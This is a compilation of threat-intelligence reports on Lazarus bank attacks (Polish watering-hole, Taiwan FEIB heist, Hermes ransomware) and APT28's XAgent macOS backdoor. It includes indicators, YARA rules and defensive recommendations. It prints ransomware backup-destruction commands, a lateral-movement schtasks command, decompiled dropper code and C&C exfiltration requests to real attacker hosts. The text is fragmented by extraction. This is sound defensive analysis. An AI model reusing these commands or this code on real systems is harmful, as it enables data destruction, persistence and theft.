attack and many others in 2016) to the watering-hole activity is unclear. However, the choice of bank supervisor /
state-bank websites would be apt, given their previous targeting of Central Banks for Heists
even when it serves
little operational benefit for infiltrating the wider banking sector.
Nonetheless, further evidence to connect together the pieces of this attack is needed, as well as insights into the
end-goal of the culprits. We are continuing our analysis of new artefacts as they emerge and may issue further
updates in due course.
RECOMMENDATIONS
We recommend organisations use the indicators provided in Appendix A to update their defensive systems to
identify attacks. For compromised legitimate websites we would suggest a minimum 1 month block be placed on the
domain. Patches against CVE-2016-0034 should be applied as soon as possible.
APPENDIX A - INDICATORS OF ATTACK
C&C IP address
125.214.195.17
196.29.166.218
Compromised site
knf.gov[.]pl (currently clean)
www.cnbv.gob[.]mx (currently clean)
brou.com[.]uy (currently clean)
sap.misapor[.]ch
www.eye-watch[.]in
MD5 Hashes
c1364bbf63b3617b25b58209e4529d8c
85d316590edfb4212049c4490db08c4b
1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae
1507e7a741367745425e0530e23768e6
911de8d67af652a87415f8c0a30688b2
1f7897b041a812f96f1925138ea38c46
cb52c013f7af0219d45953bae663c9a2
4cc10ab3f4ee6769e520694a10f611d5
7b4a8be258ecb191c4c519d7c486ed8a
Taiwan Heist: Lazarus Tools and Ransomware
baesystemsai.blogspot.kr /2017/10/taiwan-heist-lazarus-tools.html
Written by Sergei Shevchenko, Hirman Muhammad bin Abu Bakar, and James Wong
BACKGROUND
Reports emerged just over a week ago of a new cyber-enabled bank heist in Asia. Attackers targeting Far Eastern
International Bank (FEIB), a commercial firm in Taiwan, moved funds from its accounts to multiple overseas beneficiaries.
In a story which reminds us of the Bangladesh Bank case
the culprits had compromised the bank
s system connected to
the SWIFT network and used this to perform the transfers.
In recent days, various malware samples have been uploaded to malware repositories which appear to originate from the
intrusion. These include both known Lazarus group tools, as well as a rare ransomware variant called
Hermes
which may
have been used as a distraction or cover-up for the security team whilst the heist was occurring.
The timeline below provides an overview of the key events:
October
2017
Malware compiled containing admin credentials for the FEIB network.
October
2017
Transfers using MT103 messages were sent from FEIB to Cambodia, the US and Sri Lanka.
Messages to cover the funds for the payments were incorrectly created and sent.
October
2017
Breach discovered and ransomware uploaded to online malware repository site.
October
2017
Individual in Sri Lanka cashes out a reported Rs30m (~$195,000).
October
2017
Individual returns to collect more cash from account, arrested whilst doing so.
October
2017
Press become aware of the incident.
October
2017
Samples uploaded which include known Lazarus malware.
Little information is available at present about when or how the attackers compromised the bank, but it is likely more details
will emerge in the coming weeks. This blogpost seeks to summarise what is in the public domain at the moment, as well as
analyse the samples uploaded to malware repositories.
ANALYSIS
Several files have been uploaded to malware databases which appear to be related to this attack, including an archive titled
1/10
FEIB_Samples
submitted from Taiwan on 12th Oct 2017. These and other samples are listed below:
Filenames
Submitted
From
First
Seen
Compile
Time
9563e2f443c3b4e1b00f25be0a30d56e
FEIB_Samples_pwd(Virus).zi_
201710-12
02:50:16
d08f1211fe0138134e822e31a47ec5d4
bitsran.exe
201710-03
01:01:31
201710-01
15:37:31
b27881f59c8d8cc529fa80a58709db36
RSW7B37.tmp
201710-03
01:01:37
201710-01
11:34:07
3c9e71400b72cc0213c9c3e4ab4df9df
msmpeng.exe
201710-07
08:58:00
201702-20
11:09:30
0edbad9e6041d43f97c7369439a40138
FileTokenBroker.dll
201710-12
02:50:15
201701-05
01:11:33
97aaf130cfa251e5207ea74b2558293d
splwow32.exe
201710-12
02:50:15
201702-20
11:09:30
62217af0299d6e241778adb849fd2823
201710-08
03:32:47
201709-21
09:27:43
0dd7da89b7d1fe97e669f8b4156067c8
201703-14
02:13:01
201703-06
17:32:58
61075faba222f97d3367866793f0907b
201702-16
03:25:00
201702-10
15:03:30
File #1 is the ZIP file containing samples #2-6 inside. Samples #2-4 were also separately uploaded by users in Taiwan and
the US on the dates given above.
Samples #7-9 are older versions of the Hermes ransomware.
Malware Analysis
Sample #2; Bitsran loader / spreader
Sample #2 is designed to run and spread a malicious payload on the victim's network. On execution, the malware places a
copy of itself into the location:
C:\Windows\Temp\bitsran.exe
Next, the file establishes a persistence mechanism with the registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
2/10
It sets the value of
BITSRAN
to point to the executable in the Temp location above.
The malware then enumerates all processes, searching for specific anti-virus processes and attempts to kill these using the
command line tool taskkill.
Process Name
Process Description
tmbmsrv.exe
Trend Micro Unauthorized Change Prevention Service
tmccsf.exe
Trend Micro OfficeScan Common Client Solution Framework
cntaosmgr.exe
Trend Micro OfficeScan Add-on Service Client Management Service
ntrtscan.exe
Trend Micro OfficeScan NT RealTime Scan
pccntmon.exe
Trend Micro OfficeScan Antivirus real-time scan monitor
tmlisten.exe
Trend Micro OfficeScan NT Listener
tmpfw.exe
Trend Micro OfficeScan NT Firewall
Next, the process attempts to find an embedded
IMAGE
resource with offset #110. If successful, this file is loaded into
memory. When manually extracting this file, it can be seen to represent a pixelated bitmap (BMP) file.
However, further investigation reveals that the file is what is known
as a
Polyglot
file, whereby a file is contained within another file.
Using a HEX viewer, it is possible to see that this file also contains
a ZIP file (beginning at the
header), with the pixelated image
above referencing the bytes of the file to be RGB values.
3/10
The contents of this resource is decompressed from offset 54, with the last 4 bytes of the file specifying the ZIP
s file size in
bytes. When successfully decrypted, the file is saved into the same directory as the initial executable. This takes the
filename
RSWXXXX.tmp
, where
XXXX
is randomly generated through the GetTempFileName function. Once written to
disk, this process is created through the CreateProcess function. Sample #3 (RSW7B37.tmp) is an example of this file.
Whilst this additional payload is executing, the initial malware attempts to copy itself to other devices on the network. Two
user accounts are hardcoded into the malware, and are used to establish connections to the C$ SMB shares on Windows
devices. These are the accounts:
Account Name
Account Password
FEIB\SPUSER14
#ED{REMOVED}
FEIB\scomadmin
!it{REMOVED}
Both accounts clearly relate to FEIB, though we couldn
t confirm whether the credentials are valid or not. The SPUSER14
may be a Sharepoint user account whilst scomadmin likely corresponds to System Center Operations Manager admin
an account for managing machines in a data centre.
Instead of enumerating all devices on the network, the malware iterates through a hardcoded list of 5357 IP addresses, in
the ranges:
10.49.*
10.50.*
10.51.*
10.59.*
It is assumed that previous reconnaissance was conducted by the actors on the internal network to identify active and
responding devices, as well as capturing admin credentials for the network.
If a device successfully responds to a SMB packet on port 445, the malware copies itself to the C$ network share using the
provided credentials, writing the file to the location:
C:\Windows\Temp\bitsran.exe
If successful, a further command is executed using the same credentials, to create a scheduled task on the remote device
with the name
BITSRAN
. The full command executed is:
cmd.exe /c schtasks /create /tn
BITSRAN
/tr /s /u /p /st 00:00 /et 23:59 /sc minute /mo
1 /ru system /f
Malware Analysis
Sample #3, Dropped file / Hermes Ransomware
The dropped file is a variant of the Hermes ransomware.
The ransomware calls GetSystemDefaultLangID() to obtain language identifier for the system locale. It contains a list of
three system language codes: 0x0419 (Russian), 0x0422 (Ukrainian), and 0x0423 (Belarusian). However, it only checks
against the last two, and, if matching, the malware quits. Whether this is a false-flag or not is unknown.
4/10
The ransomware deletes the Volume Shadow Copies (a type of backup on Windows), using command:
vssadmin Delete Shadows /all
/quiet
Following that, it deletes all VSS (Volume Shadow Copy Service) backup files (which include System Restore files) and
orphaned shadows, by running commands below for the drives from C:, D:, E:, F:, G:, and H:
vssadmin resize shadowstorage /for=%DRIVE% /on=%DRIVE% /maxsize=401MB vssadmin resize
shadowstorage /for=%DRIVE% /on=%DRIVE% /maxsize=unbounded
The trick above is called "pulling the carpet" as it forces Windows to voluntarily dump all shadows due to lack of space.
The ransomware then recursively deletes all backup files from the drives C:, D:, E:, F:, G:, and H:, having the following
extensions:
*.VHD
*.bac
*.bak
*.wbcat
*.bkf
Backup*.*
backup*.*
*.set
*.win
*.dsk
Using Windows CryptoAPI platform, the malware creates an exchange key pair, and then exports the 2,048-bit public RSA
key into an external file called PUBLIC.
The ransomware then enumerates both local and network resources, and encrypts files using 2,048-bit RSA algorithm.
Each encrypted directory will have a ransom note left in it:
HERMES 2.1 RANSOMWARE radical edition
All your important files are encrypted
Your files has been encrypted using RSA2048 algorithm with unique public-key stored on
your PC.
There is only one way to get your files back: contact with us, pay, and get decryptor
software.
You have "UNIQUE_ID_DO_NOT_REMOVE" file on your desktop also it duplicated in some
folders,
its your unique idkey, attach it to letter when contact with us. Also you can decrypt 3
files for test.
We accept Bitcoin, you can find exchangers on https://www.bitcoin.com/buy-bitcoin and
others.
Contact information: BM-2cVcZL1xfve1yGGKwEBgG1ge6xJ5PYGfGw@bitmessage.ch
reserve: BM-2cT4U1vBdjfqKDeWMEXgCWs9SfnMK1GLTF@bitmessage.ch
Malware Analysis
Samples #4 and #6, Lazarus malware
5/10
Sample #4 (msmpeng.exe) is packed with Themida to hamper analysis under a debugger, a monitoring application, or a
virtual machine.
Once fully unpacked in memory, it appears to be an x86 variant of the fdsvc.dll backdoor described in our February
blogpost
Lazarus
False Flag Malware
. This malware was discovered on networks in Poland and Mexico, following a
series of watering-hole attacks.
Just like before, the backdoor uses several transliterated Russian words to either indicate the state of its communication or
issue backdoor commands:
State/Command
Translation from Russian
Meaning
Nachalo
beginning
start communication session
ustanavlivat
to set
handshake state
poluchit
to receive
receive data
pereslat
to send
send data
derzhat
to maintain
maintain communication session
vykhodit
to exit
exit communication session
kliyent2podklyuchit
client to connect
client is ready to connect
Sample #6 (splwow32.exe) is the same backdoor, only it
s not packed.
Both sample #4 and #6 have the same time stamp: 20 February 2017, 11:09:30. It appears that sample #6 was actually
obtained by packing sample #4 with Themida (potentially, to avoid detection), as code/data found in both samples is
identical.
The backdoor expects a command line parameter that specifies remote C&C address and port number. If it is executed
with no command-line parameters, it quits.
The specified command-line parameter is decrypted, using some basic character manipulations and applying XOR with 2
keys:
0x517A4563 (
QzEc
0x77506F66 (
wPof
The decrypted string is expected to delimit C&C address and port number with the
character. Multiple C&Cs can be
delimited with the
character.
If the backdoor finds no valid pair of C&C address and port number delimited with the
character, it quits.
Otherwise, it starts polling the remote C&C for a remote task to execute. Each polling attempt starts from a state
Nachalo
start communication session
), with a 3 second delay between each attempt to connect to the C&C.
Each connection attempt starts from a state called
kliyent2podklyuchit
client is ready to connect
If the backdoor fails to connect five times, or if it connects, but the task it receives is
vykhodit
exit communication
session
), then the backdoor will quit. Otherwise, it will execute the remote command, effectively giving the attackers full
control over the compromised system. After the execution, the polling cycle continues.
6/10
Malware Analysis
Sample #5
FileTokenBroker.dll is a DLL, installed as a service under the svchost.exe (netsvcs) service host.
Once loaded as a service DLL, the DLL's export ServiceMain() is called. The DLL then constructs a file name that consists
of the host process name, formatted as:
%SYSTEM%\en-US\[HOST_PROCESS_NAME_NO_EXTENSION].dll.mui
For example, if the DLL is loaded into the address space of svchost.exe, the constructed filename will be:
c:\windows\system32\en-US\svchost.dll.mui
Another possible name is:
c:\windows\system32\en-US\netsvc.dll.mui
The DLL then reads this file, and decrypts it with a running XOR mask. Once decrypted, it further reads an RC4 key from it,
and decrypts it with the RC4 algorithm.
The decrypted file will contain a hash, so the DLL checks the hash as well to make sure the integrity of the decrypted file is
intact.
A fully decrypted file is then parsed as a PE file, and loaded as a DLL.
Hence, FileTokenBroker.dll decrypts and executes a payload that is created by an external dropper or is implanted
by the attackers.
The %SYSTEM%\en-US directory will have multiple system files in it, so it is chosen to blend the encrypted payload file with
the other legitimate system files. Unlike other *.dll.mui files in %SYSTEM%\en-US directory that are MZ files, the
encrypted payload is not an MZ file.
Malware Analysis
Samples #7, #8, and #9, Further Hermes malware
Samples #7, #8, and #9 relate to previous instances of Hermes ransomware.
Malware of this category is typically widespread, but in the case of Hermes it seems relatively rare. This is suspicious in
itself and reminds us of WannaCry
another rarely observed ransomware. Further analysis is on-going to understand the
history of this malware variant.
Transactions
Through working with trusted partners, we have been able to get insight into the transactions made as part of the heist. The
transactions consisted of two common SWIFT message types, MT103 and MT202COV.
MT103 messages are used for normal, cross border, cash transfers which would typically request funds be transferred into
a personal or company beneficiary account. MT103 messages can be used on their own, or can be coupled with a cover
message; MT202COV is used to order the movement of funds to the beneficiary institution via another financial
institution/Intermediary Bank.
In this heist the attackers created MT103 messages to transfer funds to Cambodia, the US, and Sri Lanka. In addition to the
7/10
MT103 messages, the attackers created MT202COV messages; the content of these messages was syntactically correct but
the values in specific fields were wrong. As a result, they were received by the intermediary bank but had no further
influence on the funds transferred to the beneficiary accounts.
Reports of $60M being stolen appear to be due to confusion over these latter messages, and the amounts actually stolen
were considerably lower. Most of these appear to have been recovered.
Further details of the destination accounts within Sri Lanka have emerged in open source. The money had been transferred
to the Bank of Ceylon in Sri Lanka on 3 October. The following day, an individual in Sri Lanka allegedly withdrew RS 30m
(about $195K). Two days after that, the same individual returned to withdraw a further RS 8m, but was arrested when he
arrived at the bank. Sri Lankan police have since arrested another individual and a further suspect is wanted by Sri Lankan
law enforcement.
CONCLUSIONS
It has been over a year since the last activity on a payments system from the attackers behind the infamous Bangladesh
Bank heist. Lazarus, the prime suspects, have been busy nonetheless
targeting Bitcoin in various ways, as well as other
intrusions into banks such as in Poland and Mexico (albeit without evidence of targeting payment systems). In one of these
cases we and other researchers were able to observe infrastructure in North Korea controlling the malware
further clues
as to the origins of these attackers.
The attack this month on Taiwanese Far Eastern International Bank has some of the hallmarks of the Lazarus group:
Destination beneficiary accounts in Sri Lanka and Cambodia
both countries have been used previously as
destinations for Lazarus
bank heist activity;
Use of malware previously seen in Lazarus
Poland and Mexico bank attacks. Where these files were found and
the context of their use needs to be confirmed, but could provide a crucial attributive link;
Use of unusual ransomware, potentially as a distraction.
Despite their continued success in getting onto payment systems in banks, the Lazarus group still struggle getting the cash
in the end, with payments being reversed soon after the attacks are uncovered. The group may be trying new tricks to
disrupt victims and delay their ability to respond
such as different message formats, and the deployment of ransomware
across the victim
s network as a smokescreen for their other activity. It
s likely they
ll continue their heist attempts against
banks in the coming months and we expect they will evolve their modus operandi to incorporate new ways of disrupting
victims (and possibly the wider community) from responding.
More work needs to be done to identify how FEIB was attacked, whether further custom tools were involved, confirm the
context of the Lazarus malware in the intrusion, and where else this Hermes ransomware has been seen.
Assuming Lazarus are indeed back to targeting bank payment systems, this will serve to emphasize the importance of
network hardening and controls frameworks being pushed by the industry at present.
RECOMMENDATIONS
Some general network hardening and monitoring lessons can be taken from this:
Firewall off SMB (445) for internal computers. If access to this service is required, it should be permitted only for
those IP
s that require access. i.e. 445 is required for SCOM to push an agent install, therefore 445 should only be
allowed from that source server;
8/10
Application blacklisting should be implemented to prevent the use of tools such as vssadmin.exe, cmd.exe,
powershell.exe and similar;
File Integrity Monitoring should be considered and configured to monitor file creations in
trusted
locations such
as the System32 directory. This can also be used to monitor deletes, with an alert configured to fire on excessive
deletes in a row;
Windows Security Event logs should be monitored to capture Scheduled Task creation events
Event ID 4698;
Registry Auditing should be enabled and monitored to capture any additions to
HKLM\Software\Microsoft\Windows\CurrentVersion\Run;
Excessive use of known administrative privilege accounts should be alerted on
specifically in a
one to many
behavioural configuration. i.e. is one specific IP connecting to a large number of devices using the same credentials
in a short period of time;
Ensure privileged accounts have a complex password that does not include any part of the username, or
application it relates to.
Additional longer term recommendations for financial institutions:
Practice incident response scenarios which include complex attacks combining covert payment fraud and overt
network disruption through ransomware, DDoS, network downtime, etc.
Ensure that you are progressing towards being able to attest against the SWIFT 27 controls.
For more information see:
http://www.baesystems.com/en/cybersecurity/swift-customer-security-programme
APPENDIX A
INDICATORS OF ATTACK
MD5 Hashes
d08f1211fe0138134e822e31a47ec5d4
b27881f59c8d8cc529fa80a58709db36
3c9e71400b72cc0213c9c3e4ab4df9df
0edbad9e6041d43f97c7369439a40138
97aaf130cfa251e5207ea74b2558293d
62217af0299d6e241778adb849fd2823
0dd7da89b7d1fe97e669f8b4156067c8
61075faba222f97d3367866793f0907b
File / Process name
bitsran.exe
APPENDIX B
YARA RULE
9/10
rule Hermes2_1 {
meta:
date = "2017/10/11"
author = "BAE"
hash = "b27881f59c8d8cc529fa80a58709db36"
strings:
$magic = { 4D 5A }
//in both version 2.1 and sample in Feb
$s1 = "SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\"
$s2 = "0419"
$s3 = "0422"
$s4 = "0423"
//in version 2.1 only
$S1 = "HERMES"
$S2 = "vssadminn"
$S3 = "finish work"
$S4 = "testlib.dll"
$S5 = "shadowstorageiet"
//maybe unique in the file
$u1 = "ALKnvfoi4tbmiom3t40iomfr0i3t4jmvri3tb4mvi3btv3rgt4t777"
$u2 = "HERMES 2.1 TEST BUILD, press ok"
$u3 = "hnKwtMcOadHwnXutKHqPvpgfysFXfAFTcaDHNdCnktA" //RSA Key part
condition:
$magic at 0 and all of ($s*) and 3 of ($S*) and 1 of ($u*)
10/10
Several Polish banks hacked, information stolen by unknown
attackers
badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
badcyber
2/3/2017
Polish banks are frantically scanning their workstations and servers while checking logs in the search of signs of
infection after some of them noticed unusual network activity and unauthorised files on key machines within their
networks. This is
by far
the most serious information security incident we have seen in Poland.
It has been a busy week in SOCs all over Polish financial sector. At least a few of Polish 20-something commercial
banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic
locations and encrypted executables nobody recognised on some servers were the first signs of trouble. A little more
than a week ago one of the banks detected strange malware present in a few workstations. Having established basic
indicators of compromise managed to share that information with other banks, who started asking their SIEMs for
information. In some cases the results came back positive.
Delivery
Preliminary investigation suggests that the starting point for the infection could have been located on the webserver of
Polish financial sector regulatory body, Polish Financial Supervision Authority (www.knf.gov.pl). Due to a slight
modification of one of the local JS files, an external JS file was loaded, which could have executed malicious payloads
on selected targets. This would be really ironic if the website of the key institution responsible for assuring proper
security level in the banking sector was used to attack it.
Current website status is
under maintenance
Data from PassiveTotal does confirm the finding related to external resources included in knf.gov.pl website since
2016-10-07 till yesterday.
To unauthorised code was located in the following file:
http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11
and looked like that:
document.write("
");
After successful exploitation malware was downloaded to the workstation, where, once executed, connected to some
foreign servers and could be used to perform network reconnaissance, lateral movement and data exfiltration. At least
in some cases the attackers managed to gain control over key servers within bank infrastructure.
Malware
While you can find some hashes at the end of this article, we gathered the available information regarding the
malware itself. While there might be some elements borrowed from other similar tools and crimeware strategies, the
malware used in this attack has not been documented before. It uses some commercial packers and multiple
obfuscation methods, has multiple stages, relies on encryption and at the moment of initial analysis was not
recognised by available AV solutions. The final payload has the functionality of a regular RAT.
Motivation
While we have no idea of attackers motivation, so far we have no knowledge of any direct financial losses incurred by
banks or their customers due to this attack. What is more troubling, some of the victims were able to identify large
outgoing data transfers. So far they could not identify the contents of the data as it was encrypted. Investigation
continues to fully understand the scope of losses.
Conclusions & IOCs
While this should not come as a surprise, this incident is the perfect example of the statement
you are going to get
infected
. Polish financial sector has some of the best people and tools in terms of security and still it looks like the
attackers achieved their objectives without major hurdles in at least some cases. On the good side
they were
detected and once notified banks were able to quickly identify infected machines and suspicious traffic patterns. The
whole process lacked solid information sharing, but this is a problem know everywhere.
We hope to continue investigating this incident and share with you more details about the malware itself in the future.
Meanwhile please find attached some IOCs we can share today:
MD5, SHA1, SHA256 hashes of some samples:
C1364BBF63B3617B25B58209E4529D8C
85D316590EDFB4212049C4490DB08C4B
1BFBC0C9E0D9CEB5C3F4F6CED6BCFEAE
496207DB444203A6A9C02A32AFF28D563999736C
4F0D7A33D23D53C0EB8B34D102CDD660FC5323A2
BEDCEAFA2109139C793CB158CEC9FA48F980FF2B
FC8607C155617E09D540C5030EABAD9A9512F656F16B38682FD50B2007583E9B
D4616F9706403A0D5A2F9A8726230A4693E4C95C58DF5C753CCC684F1D3542E2
CC6A731E9DAFF84BAE4214603E1C3BAD8D6735B0CBB2A0EC1635B36E6A38CB3A
Some C&C IP addresses:
125.214.195.17
196.29.166.218
Potentially malicious URLs included in knf.gov.pl website:
http://sap.misapor.ch/vishop/view.jsp?pagenum=1
https://www.eye-watch.in/design/fancybox/Pnf.action
Paper
Dissecting the APT28
Mac OS X Payload
White Paper
Authors:
Tiberius Axinte, Technical Lead, Antimalware Lab
Bogdan Botezatu - senior e-threat analyst
White Paper
A post-mortem analysis of
Trojan.MAC.APT28 - XAgent
For the past decade, Windows users have been the main targets of consumer, for-profit cybercrime. Even now, malware on platforms such
as Mac OS X and Linux is extremely scarce compared with the Windows threat landscape.
Enter the upper tiers of malware creation: advanced persistent threats. These extremely complex, highly customized files are after targets,
not platforms. Attacks such as those persistently carried out by APT28 target multiple individuals in multiple organizations who run a wide
range of hardware and software configurations.
Since the group
s emergence in 2007, Bitdefender has become familiar with the backdoors used to compromise Windows and Linux
targets, such as Coreshell, Jhuhugit and Azzy for the former OS or Fysbis for the latter. This year we have been able to finally isolate the
Mac OS X counterpart - the XAgent modular backdoor. This whitepaper describes our journey in dissecting the backdoor and documenting
it piece by piece.
White Paper
A. Context
In mid-February this year, we discovered a new Mac sample that appeared to be the Mac version of the APT28 XAgent component.
This backdoor component is known to have a modular structure featuring various espionage functionalities, such as key-logging, screen
grabbing and file exfiltration. Until now this component was only available for Windows, Linux and iOS operating systems. Though you
might expect this Mac version of XAgent to be the iOS version compiled to work on Mac, it is a different creation, with a much more
advanced feature set.
The Mac version shares multiple similarities with those designed for other operating systems. However, the Mac agent brings more
spying capabilities such as stealing iOS backups from Mac computers, which contain messages, contacts, voicemail, call history, notes,
calendar and Safari data.
B. Attack Flow
Last year on 26 of September, PaloAlto identified a new Mac OS X Trojan associated with the APT28/Sofacy group that received the
Komplex
name. The Komplex Trojan is a binder with multiple parts: a dropper, a payload and a decoy pdf file.
1. The Komplex Binder: Is the main executable of
roskosmos_2015-2025.app
. Its main purpose is to save a second payload(the dropper)
on the system and open the decoy pdf file pictured below.
v7 = objc_msgSend(&OBJC_CLASS___NSString,
stringWithFormat:
, CFSTR(
%@/roskosmos_2015-2025.pdf
v6);
v8 = objc_msgSend(&OBJC_CLASS___NSString,
stringWithFormat:
, CFSTR(
SetFile -a E %@/
roskosmos_2015-2025.pdf
), v6);
v9 = objc_msgSend(&OBJC_CLASS___NSString,
stringWithFormat:
, CFSTR(
rm -rf %@/roskosmos_2015-2025.
), v6);
v10 = objc_msgSend(
&OBJC_CLASS___NSString,
stringWithFormat:
CFSTR(
open -a Preview.app %@/roskosmos_2015-2025.pdf
v6);
v11 = objc_msgSend(&OBJC_CLASS___NSData,
dataWithBytes:length:
, &joiner, 135028LL);
objc_msgSend(v11,
writeToFile:atomically:
, CFSTR(
/tmp/content
), 1LL);
v12 = (const char *)objc_msgSend(v9,
UTF8String
system(v12);
system(
chmod 755 /tmp/content
v13 = objc_msgSend(&OBJC_CLASS___NSData,
dataWithBytes:length:
, &pdf, 1584258LL);
objc_msgSend(v13,
writeToFile:atomically:
, v7, 1LL);
v14 = (const char *)objc_msgSend(v8,
UTF8String
system(v14);
v15 = objc_msgSend(&OBJC_CLASS___NSTask,
alloc
v16 = objc_msgSend(v15,
init
objc_msgSend(v16,
setLaunchPath:
, CFSTR(
/tmp/content
objc_msgSend(v16,
launch
objc_msgSend(v16,
waitUntilExit
v17 = (const char *)objc_msgSend(v10,
UTF8String
system(v17);
The Komplex Binder
White Paper
Komplex: roskosmos_2015-2025.pdf
2. The Komplex Dropper: Its main functionality is to drop a third Komplex component: the final payload, and ensure persistence on the
infected system
system(
mkdir -p /Users/Shared/.local/ &> /dev/null
system(
mkdir -p ~/Library/LaunchAgents/ &> /dev/null
off_10001B4F0(v5, &off_10001B4F0, CFSTR(
/Users/Shared/.local/kextd
), 1LL);
off_10001B4F0(v6, &off_10001B4F0, CFSTR(
/Users/Shared/com.apple.updates.plist
), 1LL);
off_10001B4F0(v7, &off_10001B4F0, CFSTR(
/Users/Shared/start.sh
), 1LL);
system(
cp /Users/Shared/com.apple.updates.plist $HOME/Library/LaunchAgents/ &>/dev/null
remove(
/Users/Shared/com.apple.updates.plist
system(
chmod 755 /Users/Shared/.local/kextd
system(
chmod 755 /Users/Shared/start.sh
3. The Komplex Payload: Is the final component of the Komplex malware, with the sole purpose of downloading and executing a file, as
requested by the C&C servers.
In other words, Komplex is an APT28/Sofacy component that can be distributed via email, disguised as a PDF document, to establish
a foothold in a system. Once it infects the host, it can download and run the next APT28/Sofacy component, which - to the best of our
knowledge - is the XAgent malware that forms the object of this paper.
Our assumption is guided by hard evidence included in the binary. Our forensics endeavor revealed a number of indicators that made us
think XAgent was distributed via Komplex malware:
White Paper
Project path
Komplex
XAgent
/Users/kazak/Desktop/Project/komplex
/Users/kazak/Desktop/Project/XAgentOSX
Malware path /Users/Shared/.local/kextd
on the infected
system
/Username/Library/Assistants/.local/random_name
apple-iclods.org
apple-iclods[.]net
Possible Attack Flow
White Paper
C. Initialization
The main module of the XAgent component is called BootXLoader. Upon starting, it calls the runLoader method, which orchestrates the
following:
Checks if a debugger is present and, if so, the malware exits.
v29 = 1;
v30 = 14;
v31 = 1;
v32 = getpid();
v26 = 648LL;
if ( sysctl(&v29, 4u, &v27, &v26, 0LL, 0LL) )
goto LABEL_13;
The module then waits for internet connectivity by pinging
8.8.8.8
v7 = v2;
v3 = 0;
objc_retainAutorelease(CFSTR(
8.8.8.8
v4 = objc_msgSend_ptr(CFSTR(
8.8.8.8
), selRef_cStringUsingEncoding_, 1LL, v7);
v5 = SCNetworkReachabilityCreateWithName(0LL, (__int64)v4);
HIDWORD(v7) = 0;
if ( (unsigned __int8)SCNetworkReachabilityGetFlags(v5, (char *)&v7 + 4) )
Initializes the module used for communicating with the C&C servers (called HTTPChannel) and establishes communication
between the malware and the C&C servers.
http_chanel_obj = objc_msgSend_ptr(classRef_HTTPChannel, selRef_alloc);
v12 = v10(http_chanel_obj, (const char *)selRef_init);
v13 = v10(classRef_NSThread, selRef_alloc);
v14 = objc_msgSend_ptr(v13, selRef_initWithTarget_selector_object_, v4, selRef_postThread_, v12);
objc_msgSend_ptr(v14, selRef_start);
v15 = objc_msgSend_ptr(classRef_NSThread, selRef_alloc);
v16 = objc_msgSend_ptr(v15, selRef_initWithTarget_selector_object_, v4, selRef_getThread_, v12);
objc_msgSend_ptr(v16, selRef_start);
Starts the main handle module for C&C commands and the spying modules: MainHandler
v6 = objc_msgSend_ptr(classRef_MainHandler, selRef_alloc);
v7 = objc_msgSend_ptr(v6, (const char *)selRef_init);
v8 = objc_retain_ptr(v5, selRef_init);
v9 = v7[4];
v7[4] = v8;
objc_release_ptr(v9);
objc_msgSend_ptr(v7, selRef_cycleLoop);
White Paper
D. Communication
The agent starts by selecting a C&C server from a hardcoded list, then sends a hello message and starts two main communications
threads:
One for receiving commands from the C&C server, in an infinite GET loop.
One for sending data to the C&C server, in an infinite POST loop.
Receiving commands from C&C server
The agent awaits C&C commands from the server and inserts them into a command queue that will be executed in a separate thread by
MainHandler module.
C&C Servers
http://23.227.196.215
http://apple-iclods.org
http://apple-checker.org
http://apple-uptoday.org
http://apple-search.info
The command structure, called cmdPacket, contains a command identifier, a command parameter and a size for the parameter.
struct cmdPacket {
unsigned char cmd;
char *param;
unsigned long long param_size;
Command Structure
The command request to the C&C server is made via HTTP GET. It receives a base64 encoded cmdPacket that has previously been
encrypted with RC4 using a hardcoded KERNEL_CRYPTO_MAIN_KEY.
HTTP GET Request
Method
Server
Verbs
search/?, find/?, results/?, open/?, search/?, close/?
Args
from=, itwm=, ags=, oe=, aq=, btnG=, oprnd=, itwm=, utm=, channel=
Response
(base64)
Request a command from server
White Paper
http://apple-iclods.org/close/?itwm=LO6iNPjpD0U8AVlLo_Hk3X9FSgAF&xzxI4=9_qwCS03APJT HTTP/1.1
Host: apple-iclods.org
Pragma: no-cache
Connection: keep-alive
Accept: */*
User-Agent: 4fe4b9560e99e33dabca553e2eeee510
CFNetwork/673.3 Darwin/13.4.0 (x86_64)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Example of GET message
Based on the command from the C&C server, the agent decodes and decrypts the command structure, and inserts it in a command queue
to be executed by the MainHandler module.
Command Value
Command char Module
Action
InfoOS
getOsInfo
InfoOS
getProcessList
RemoteShell
executeShellCommand
RemoteShell
getInstalledApps
RemoteShell
checkBackupIosDeviceFolder
FileSystem
downloadFileFromPath
FileSystem
createFileInSystem
FileSystem
executeFile
FileSystem
deleteFile
ScreenShot
takeScreenShot
ScreenShot
Start screenShotLoop
ScreenShot
Stop screenShotLoop
Password
getFirefoxPassword
uploadFile:urlServer:userName:password:
stopOperation
FileSystem
readFiles
C&C Commands and Actions
2. Sending information to C&C server
To exfiltrate information to the C&C server (such as screenshots, passwords, files and more), the agent uses a defined structure called
msgPacket.
struct msgPacket {
int agent_id;
short module_id;
unsigned char cmd_id;
char *data_;
unsigned int data_size;
unsigned char priority;
Message Structure
White Paper
The message is encrypted with RC4 with a hardcoded KERNEL_CRYPTO_MAIN_KEY. It then appends a key and a DATA_TOKEN xor-ed
with the key. Ultimately, the module encodes the result with base64 and sends it to the C&C server in a POST request.
HTTP POST Request
Method
POST
Server
Body(base64)
Send message to server
When starting the communication, the agent sends a hello message to the server using the POST request detailed above. This request has
the following HTTP body:
POST Body for Hello Message
agent_id
IOPlatformUUID
module_id
0x3303
cmd_id
data
0x3303#3333#3344#3355#3377#
data_size
priority
0x16
Hello message body
POST http://23.227.196.215/watch/?itwm=7FJcXOPyN_Znh7quXfh4WAaKquNzY
&oe=9cu2LRvfab&ags=Pi8KZsjwBh&oe=HXK20P&aq=h2RBWMQI&aq=yRRTH&i5H=MKNBXTB
Host: 23.227.196.215
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: 4fe4b9560e99e33dabca553e2eeee510 (unknown version) CFNetwork/673.3 Darwin/13.4.0 (x86_64)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Length: 81
